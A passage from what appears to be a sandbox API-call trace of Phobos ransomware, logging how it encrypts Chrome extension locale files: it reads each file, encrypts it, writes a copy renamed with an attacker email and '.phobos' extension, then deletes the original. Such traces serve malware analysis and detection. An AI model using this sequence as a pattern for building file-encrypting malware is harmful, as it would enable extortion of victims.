"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.598] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.598] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.599] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.599] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.599] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd4, lpOverlapped=0x0) returned 1 [0154.601] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0154.601] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0154.602] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.602] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.602] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.602] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.602] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.602] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.602] CloseHandle (hObject=0x130) returned 1 [0154.602] CloseHandle (hObject=0x14c) returned 1 [0154.602] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json")) returned 1 [0154.603] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.603] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=152) returned 1 [0154.604] CloseHandle (hObject=0x14c) returned 1 [0154.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json")) returned 0x2020 [0154.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.604] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.604] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.604] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.604] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.604] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x98, lpOverlapped=0x0) returned 1 [0154.605] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0154.605] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa0, lpOverlapped=0x0) returned 1 [0154.606] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.606] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.606] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.606] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.606] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.606] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.606] CloseHandle (hObject=0x14c) returned 1 [0154.606] CloseHandle (hObject=0x130) returned 1 [0154.606] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json")) returned 1 [0154.607] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.608] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=255) returned 1 [0154.608] CloseHandle (hObject=0x130) returned 1 [0154.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json")) returned 0x2020 [0154.608] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.608] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.608] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.609] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.609] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xff, lpOverlapped=0x0) returned 1 [0154.609] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0154.609] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0154.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.610] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.610] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.610] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.610] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.610] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.611] CloseHandle (hObject=0x130) returned 1 [0154.611] CloseHandle (hObject=0x14c) returned 1 [0154.611] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json")) returned 1 [0154.612] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.612] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=183) returned 1 [0154.612] CloseHandle (hObject=0x14c) returned 1 [0154.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json")) returned 0x2020 [0154.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.612] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.612] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.613] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0154.613] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.613] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb7, lpOverlapped=0x0) returned 1 [0154.614] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.614] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0154.615] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.615] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.615] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.615] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.615] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.615] CloseHandle (hObject=0x14c) returned 1 [0154.615] CloseHandle (hObject=0x130) returned 1 [0154.615] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json")) returned 1 [0154.616] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.616] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=199) returned 1 [0154.616] CloseHandle (hObject=0x130) returned 1 [0154.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json")) returned 0x2020 [0154.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.617] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.617] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 